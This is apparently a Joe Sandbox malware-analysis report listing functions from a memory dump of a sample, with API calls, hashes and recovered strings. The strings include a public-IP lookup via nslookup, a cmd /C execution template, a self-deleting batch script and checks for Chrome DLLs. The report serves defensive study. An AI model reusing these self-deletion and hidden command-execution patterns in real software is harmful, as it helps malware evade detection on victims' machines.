.exe, xrefs: 001C7659, 001C766B, 001C76A1
.dll, xrefs: 001C7652

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 47b7526b28a6c457f7565b6ab4c57685db0ee45571cc226c9d5f3fefd35cddc1
Instruction ID: 2d0d4116206a9e4a4e87318ac2824e9194ba01dc4397f7b51fedbcf7f44b3681
Opcode Fuzzy Hash: 47b7526b28a6c457f7565b6ab4c57685db0ee45571cc226c9d5f3fefd35cddc1
Instruction Fuzzy Hash: 41418231A04659EBDB219F99CCC4F9E7BB9AB64750F100029F504AA1A1DBB1DE80CB90

Uniqueness

Uniqueness Score: 100.00%

Function 001C5902, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(001E5FBC), ref: 001C5914
lstrcpy.KERNEL32(00000000), ref: 001C5949

Part of subcall function 001D5854: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,001C1CCA,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5863
Part of subcall function 001D5854: mbstowcs.NTDLL ref: 001D587F

GetLastError.KERNEL32(00000000), ref: 001C59DA
HeapFree.KERNEL32(00000000,?), ref: 001C59F1
InterlockedDecrement.KERNEL32(001E5FBC), ref: 001C5A08
DeleteFileA.KERNEL32(00000000), ref: 001C5A29
HeapFree.KERNEL32(00000000,00000000), ref: 001C5A39

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

Strings

.avi, xrefs: 001C593C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: ddc9bc7db7c483c5484902f1ed0f9dd00f5ba129b05f9c76fa6080d20841a72d
Instruction ID: 04f0f7642667ccc71872f33d485813a31ce267847a9b1ba3ac045dad18ddf603
Opcode Fuzzy Hash: ddc9bc7db7c483c5484902f1ed0f9dd00f5ba129b05f9c76fa6080d20841a72d
Instruction Fuzzy Hash: 4031F632900A14FBCB119FA5CC85BAEBAB6EFA8764F204059F505DB190D7B4DEC1D790

Uniqueness

Uniqueness Score: 2.84%

Function 001C6B70, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C6B94

Part of subcall function 001CE0E8: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,001C6BB1,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001CE0F9
Part of subcall function 001CE0E8: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,001C6BB1,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001CE100
Part of subcall function 001CE0E8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE112
Part of subcall function 001CE0E8: _snprintf.NTDLL ref: 001CE135
Part of subcall function 001CE0E8: _snprintf.NTDLL ref: 001CE160
Part of subcall function 001CE0E8: HeapFree.KERNEL32(00000000,?,00000000,000000FF,?,00000F00), ref: 001CE183

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 001C6C20
HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 001C6C3D
DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001C6C45
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001C6C54

Strings

nslookup myip.opendns.com resolver1.opendns.com , xrefs: 001C6BA1
ss: *.*.*.*, xrefs: 001C6BD6, 001C6BDB, 001C6BFE
s:, xrefs: 001C6C16

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: ed53a9e6b479b8933035c5f6cda3d6b1a74d37d3b9f6bbfcb90a4ffcf5381228
Instruction ID: 09af8ce2e5791718c4a89fde3c7781b54a78836f800489ca32e08c4b78921ccc
Opcode Fuzzy Hash: ed53a9e6b479b8933035c5f6cda3d6b1a74d37d3b9f6bbfcb90a4ffcf5381228
Instruction Fuzzy Hash: 62216272A00249BFDB109BE9CD85FAFBBBCEF28310F040468F544E6192E7B49A40C760

Uniqueness

Uniqueness Score: 100.00%

Function 001D58A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,77A381D0,00000000,00000000), ref: 001D58CA

Part of subcall function 001D11D3: lstrcpy.KERNEL32(-000000FC,00000000), ref: 001D120D
Part of subcall function 001D11D3: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001D121F
Part of subcall function 001D11D3: GetTickCount.KERNEL32 ref: 001D122A
Part of subcall function 001D11D3: GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D1236
Part of subcall function 001D11D3: lstrcpy.KERNEL32(00000000), ref: 001D1250

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

lstrcpy.KERNEL32(00000000), ref: 001D58FA
wsprintfA.USER32 ref: 001D590D
GetTickCount.KERNEL32 ref: 001D5922
wsprintfA.USER32 ref: 001D5930

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Strings

attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 001D592A
"%S", xrefs: 001D5907
.bat, xrefs: 001D58ED

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: 17739bd4ce67eddabd395c75a308cd184d1459ef10fcad5f80a15aba431448e0
Instruction ID: dfdc74bfff0738db5f784f498f83b6e8f45d3fb9b93f78fa28ce6337b04a78f0
Opcode Fuzzy Hash: 17739bd4ce67eddabd395c75a308cd184d1459ef10fcad5f80a15aba431448e0
Instruction Fuzzy Hash: 4E1123B2900B517BD31137B89C9AE5FBB6CCFA0764F04441AFA04A7242DB74D9008BB2

Uniqueness

Uniqueness Score: 100.00%

Function 001CE0E8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,001C6BB1,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001CE0F9
lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,001C6BB1,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 001CE100
RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE112
_snprintf.NTDLL ref: 001CE135

Part of subcall function 001C5189: memset.NTDLL ref: 001C519E
Part of subcall function 001C5189: lstrlenW.KERNEL32(00000000,00000000,?), ref: 001C51D9
Part of subcall function 001C5189: wcstombs.NTDLL ref: 001C51E3
Part of subcall function 001C5189: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0C000000,00000000,?,00000044,?,?), ref: 001C5217
Part of subcall function 001C5189: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C5243
Part of subcall function 001C5189: TerminateProcess.KERNEL32(?,000003E5), ref: 001C5259
Part of subcall function 001C5189: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C526D
Part of subcall function 001C5189: CloseHandle.KERNEL32(?), ref: 001C52A0
Part of subcall function 001C5189: CloseHandle.KERNEL32(?), ref: 001C52A5

_snprintf.NTDLL ref: 001CE160

Part of subcall function 001C5189: GetLastError.KERNEL32 ref: 001C5271
Part of subcall function 001C5189: GetExitCodeProcess.KERNEL32(?,00000001), ref: 001C5291

HeapFree.KERNEL32(00000000,?,00000000,000000FF,?,00000F00), ref: 001CE183

Strings

echo -------- >, xrefs: 001CE154
cmd /C "%s> %s1", xrefs: 001CE124, 001CE12C, 001CE159

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: fed4e139eab39ac00a7331d378cb0061bf3e144765e5540386666805e2d71926
Instruction ID: 9026dced67346d1d86ca8afd933c932c08eb748200d8994d4e4c529b7e3a41c7
Opcode Fuzzy Hash: fed4e139eab39ac00a7331d378cb0061bf3e144765e5540386666805e2d71926
Instruction Fuzzy Hash: AD118B32900228BFDF225F94CC45F9E7F6AEF44760F154115F9046A2A0C7719AA0DB90

Uniqueness

Uniqueness Score: 100.00%

Function 001DFC83, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,779F5520), ref: 001DFC9A
lstrlen.KERNEL32(?), ref: 001DFCA2
lstrlen.KERNEL32(?), ref: 001DFD0D
RtlAllocateHeap.NTDLL(00000000,?), ref: 001DFD38
memcpy.NTDLL(00000000,00000002,?), ref: 001DFD49
memcpy.NTDLL(00000000,?,?), ref: 001DFD5F
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 001DFD71
memcpy.NTDLL(00000000,001E2408,00000002,00000000,?,?,00000000,?,?), ref: 001DFD84
memcpy.NTDLL(00000000,?,00000002), ref: 001DFD99

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: f3d0fb387e44796094b8d1707f6ddba8982bb9751c1e76576b544aa4a3704a46
Instruction ID: 643a5806879741773e3f3adf4b34b90bb104151b8ce7a0d011a0156d436bf2b2
Opcode Fuzzy Hash: f3d0fb387e44796094b8d1707f6ddba8982bb9751c1e76576b544aa4a3704a46
Instruction Fuzzy Hash: 09411772D00219FFCF01DFA8CC81A9EBBB9EF58318F14446AE915A7241E771AB51DB90

Uniqueness

Uniqueness Score: 100.00%

Function 001C3519, Relevance: 13.6, APIs: 9, Instructions: 108memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7C2E: RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C7C36
Part of subcall function 001C7C2E: RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C7C4B
Part of subcall function 001C7C2E: InterlockedIncrement.KERNEL32(0000001C), ref: 001C7C64

RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3567
lstrlen.KERNEL32(00000008,?,?), ref: 001C3577
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 001C3589
HeapFree.KERNEL32(00000000,?,?,?), ref: 001C359B
memcpy.NTDLL(?,?,?,?,?), ref: 001C35AF
lstrcpy.KERNEL32 ref: 001C35E1
RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C35EC
RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C3645

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 28efa032d136fcc461710931a55f31b37314edc3fe765b106e161336367d8fe0
Instruction ID: 81ee29cb1e438caafadf018b64c8bb772fcc0ac71b2cfcacfa44eda574400a06
Opcode Fuzzy Hash: 28efa032d136fcc461710931a55f31b37314edc3fe765b106e161336367d8fe0
Instruction Fuzzy Hash: B7416571500344EFCB219F94D981F5EBBF9FB28760F10842DF9199A6A2CB71DA81DB90

Uniqueness

Uniqueness Score: 100.00%

Function 001DB407, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 001DB448
GetLastError.KERNEL32 ref: 001DB452
WaitForSingleObject.KERNEL32(000000C8), ref: 001DB477
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 001DB498
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 001DB4C0
WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 001DB4D5
SetEndOfFile.KERNEL32(?), ref: 001DB4E2
GetLastError.KERNEL32 ref: 001DB4EE
CloseHandle.KERNEL32(?), ref: 001DB4FA

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: b7e5f41f418041f9c2f79c915ee5ea409244952bb997674e0bc7fcd53c4dc3da
Instruction ID: aeb37177c35b4031afe0c3d6d48c90ed51eb10c7ed8bed4ac90fdf5f0e791c38
Opcode Fuzzy Hash: b7e5f41f418041f9c2f79c915ee5ea409244952bb997674e0bc7fcd53c4dc3da
Instruction Fuzzy Hash: 0B319F71900248FFDB20CFA4DD89BAE7BB9EB04324F208155F912EA1E1C7748E94DB21

Uniqueness

Uniqueness Score: 1.13%

Function 001DF6BD, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,001DBF31,00000008,001DE01D,00000010,00000001,00000000,0000012B,001DE01D,00000000), ref: 001DF6DC
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001DF710
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001DF718
GetLastError.KERNEL32 ref: 001DF722
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 001DF73E
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001DF757
CancelIo.KERNEL32(?), ref: 001DF76C
CloseHandle.KERNEL32(?), ref: 001DF77C
GetLastError.KERNEL32 ref: 001DF784

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: d2cbf91219c482ced0d14c112e187c325dbdcfd8d88d8993f657aa3cf3e6530b
Instruction ID: 7169078543fe14ad0bc1755b3f72c8106599dabf3f66b8a67036375a706846cc
Opcode Fuzzy Hash: d2cbf91219c482ced0d14c112e187c325dbdcfd8d88d8993f657aa3cf3e6530b
Instruction Fuzzy Hash: 99211D76900158FBCB119FA8EC888EE7BBDFB48351F108426F916D6250D7709B96CBA1

Uniqueness

Uniqueness Score: 0.51%

Function 001DD69E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144timestringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C4A59: InterlockedIncrement.KERNEL32(00000018), ref: 001C4AAA
Part of subcall function 001C4A59: RtlLeaveCriticalSection.NTDLL(03E58DC8), ref: 001C4B35

OpenProcess.KERNEL32(00000410,?,?,00000000,00000000,?,00000000,00000000,?,?,?,001C2957,?,?,00000000), ref: 001DD6F5
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?,?,001C2957,?,?,00000000), ref: 001DD713
GetSystemTimeAsFileTime.KERNEL32(?), ref: 001DD779
lstrlenW.KERNEL32(?), ref: 001DD7EE
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 001DD80A
memcpy.NTDLL(00000014,?,00000002), ref: 001DD822

Part of subcall function 001C468D: RtlLeaveCriticalSection.NTDLL(?), ref: 001C470A

Strings

o, xrefs: 001DD7DF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: 5909ca25ee305cbc42975a62dc77504df6e52de5b47a05a729ccffc15098effd
Instruction ID: a26b81114f6d2fd7925b6d81b940b5a74c0a734f5f0958356a6700f6853f1c42
Opcode Fuzzy Hash: 5909ca25ee305cbc42975a62dc77504df6e52de5b47a05a729ccffc15098effd
Instruction Fuzzy Hash: C35192B1600746EFDB21DFA4E884FAAB7B8FF14708F14452AE905DB650E770E984CB94

Uniqueness

Uniqueness Score: 100.00%

Function 001D32B7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000104,001E10F7,00000000,?,?,001D57C7,?,00000005,?,00000000), ref: 001D32D3
lstrlen.KERNEL32(00000000,00000104,001E10F7,00000000,?,?,001D57C7,?,00000005), ref: 001D32E9
lstrlen.KERNEL32(?,00000104,001E10F7,00000000,?,?,001D57C7,?,00000005), ref: 001D32FE
RtlAllocateHeap.NTDLL(00000000,00000030,00000104), ref: 001D3359
_snprintf.NTDLL ref: 001D3378
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 001D3397

Strings

DEVICE: %sCLASS: %sINTERFACE: %sADD: %u, xrefs: 001D3371

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFree_snprintf
String ID: DEVICE: %sCLASS: %sINTERFACE: %sADD: %u
API String ID: 3180502281-567302550
Opcode ID: df0fbc211126d1564557050dfc6eadbe45e6cce6d6f3d7cb48706643e6634aff
Instruction ID: 3cb1a71842efe36cf1234573557592f664f40120b66fbc07a027d452af633fba
Opcode Fuzzy Hash: df0fbc211126d1564557050dfc6eadbe45e6cce6d6f3d7cb48706643e6634aff
Instruction Fuzzy Hash: 5F21D032900258FFCF10DFA5DD95C9E7BAAFB48390B11402AFD16AB251CB719E50DBA1

Uniqueness

Uniqueness Score: 100.00%

Function 001DDBDA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64registrymemoryUNIQUE

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 001DDBF8
RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,77A4F710,00000000), ref: 001DDC1D
RtlAllocateHeap.NTDLL(00000000,?), ref: 001DDC2E
RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 001DDC49
HeapFree.KERNEL32(00000000,?), ref: 001DDC69
RegCloseKey.ADVAPI32(?), ref: 001DDC72

Strings

Main, xrefs: 001DDC14, 001DDC19, 001DDC45

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: 2695dbb2645abf3865c69a453dce333559c302bd1f6bae73619e8c0638635b5d
Instruction ID: 2713f1ad735d6dc43bcb23a8aa6b3b85d4a46979da018a4691b9b6648590b27e
Opcode Fuzzy Hash: 2695dbb2645abf3865c69a453dce333559c302bd1f6bae73619e8c0638635b5d
Instruction Fuzzy Hash: C411BFB6900149FFDB11DBD5ED84DAEBBBEFB08344B50006AF601A6520E7719E84DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001D57DD, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45libraryUNIQUE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(CHROME.DLL), ref: 001D57FB
GetModuleHandleA.KERNEL32(CHROME_CHILD.DLL), ref: 001D5808
LoadLibraryExW.KERNEL32(?,?,?), ref: 001D5818
GetModuleHandleA.KERNEL32(CHROME.DLL), ref: 001D582B
GetModuleHandleA.KERNEL32(CHROME_CHILD.DLL), ref: 001D5836

Strings

CHROME_CHILD.DLL, xrefs: 001D5803, 001D5831
CHROME.DLL, xrefs: 001D57F5, 001D57FA, 001D582A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID: CHROME.DLL$CHROME_CHILD.DLL
API String ID: 1178273743-1223278602
Opcode ID: c8d6fbee917f121d42c1d3972099896d885c7976fac04e39591e23aa0c9eff77
Instruction ID: b1827a10f68a16992cac1e41bd05ae5c21d521464297582a4a544f88f24e4ef4
Opcode Fuzzy Hash: c8d6fbee917f121d42c1d3972099896d885c7976fac04e39591e23aa0c9eff77
Instruction Fuzzy Hash: 30F0813160071A5F9B049B6A9C4092FBBDEAF95361715403BF821C2392DB70CC069A61

Uniqueness

Uniqueness Score: 100.00%

Function 001DDFFE, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationUNIQUE

Download Yara Rule

APIs

Part of subcall function 001DF4F8: RegCreateKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF50D
Part of subcall function 001DF4F8: lstrlen.KERNEL32(03E588A0,00000000,00000000,00000000,?,001DE01D,00000000,?), ref: 001DF53B

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 001DE043
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 001DE05B
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE0BD
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001DE0D1
WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE124
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE14D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE15D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE166

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 2527ad3445f65c7335d262f54ca6f91ef15caebd03498bd9515763a4a6e9782a
Instruction ID: 9631752e147f6a7310b887a71b901d5ee6006b7abfd28d99d3ad8367c9fd7ee8
Opcode Fuzzy Hash: 2527ad3445f65c7335d262f54ca6f91ef15caebd03498bd9515763a4a6e9782a
Instruction Fuzzy Hash: F241E2B5D0010DEFDF02AFD4CC848AEBBBAFB08345F10846AE515AA260D3754E95DB61

Uniqueness

Uniqueness Score: 100.00%

Function 001D9B95, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,001CB505), ref: 001D9BAB
wsprintfA.USER32 ref: 001D9BD3
lstrlen.KERNEL32(?), ref: 001D9BE2

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

wsprintfA.USER32 ref: 001D9C22
wsprintfA.USER32 ref: 001D9C57
memcpy.NTDLL(00000000,?,?), ref: 001D9C64
memcpy.NTDLL(00000008,001E2408,00000002,00000000,?,?), ref: 001D9C79
wsprintfA.USER32 ref: 001D9C9C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: de68b79a2d2fd27fc17e3a22c78ff10faf37f0d738bab760f460231855988d31
Instruction ID: 6a62f229c0c20386af75d8deb2b0f0de87e4dcf908cbf1d05c63f449c47a2f3a
Opcode Fuzzy Hash: de68b79a2d2fd27fc17e3a22c78ff10faf37f0d738bab760f460231855988d31
Instruction Fuzzy Hash: 61412C71A00109AFDB15DBA8DC85EAEB7FCFF54308B14446AF519D7351EB30EA058B60

Uniqueness

Uniqueness Score: 1.55%

Function 001D1457, Relevance: 12.1, APIs: 8, Instructions: 72memorystringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?), ref: 001D147B
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001D148D
wcstombs.NTDLL ref: 001D149B
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?), ref: 001D14BF
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001D14D4
mbstowcs.NTDLL ref: 001D14E1
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?,?), ref: 001D14F3
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,001C6A47,?,?,?,?,?), ref: 001D150D

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
